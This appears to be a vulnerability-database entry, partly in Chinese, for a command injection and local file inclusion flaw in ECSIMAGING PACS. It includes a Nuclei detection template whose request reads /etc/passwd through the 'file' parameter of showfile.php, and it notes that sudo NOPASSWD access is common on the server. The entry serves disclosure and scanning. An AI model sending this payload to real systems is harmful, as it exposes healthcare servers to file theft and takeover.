ecsimagingpacs-rce: ECSIMAGING PACS <= 6.21.5 - Command Execution and Local File Inclusion

日期: 2025-08-01 | 影响软件: ECSIMAGING PACS | POC: 已公开

漏洞描述

ECSIMAGING PACS Application 6.21.5 and below suffer from a command injection vulnerability and a local file include vulnerability. The 'file' parameter on the page /showfile.php can be exploited to perform command execution or local file inclusion. Often on ECSIMAGING PACS, the www-data user has sudo NOPASSWD access.

PoC代码[已公开]

id: ecsimagingpacs-rce

info:
  name: ECSIMAGING PACS <= 6.21.5 - Command Execution and Local File Inclusion
  author: ritikchaddha
  severity: critical
  description: ECSIMAGING PACS Application 6.21.5 and below suffer from a command injection vulnerability and a local file include vulnerability. The 'file' parameter on the page /showfile.php can be exploited to perform command execution or local file inclusion. Often on ECSIMAGING PACS, the www-data user has sudo NOPASSWD access.
  reference:
    - https://www.exploit-db.com/exploits/49388
  classification:
    cwe-id: CWE-78
  metadata:
    verified: false
    max-request: 1
  tags: ecsimagingpacs,rce,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/showfile.php?file=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a95f77546436363c9a6b46f74bad4a78d6d24bd6dc0cc60be1c1a6690296395b02207e87940f16a66478d4c63d45ae64012dd6c99565911da72e74caf73248ddb9a2:922c64590222798bb761d5b6d8e72950

相关漏洞推荐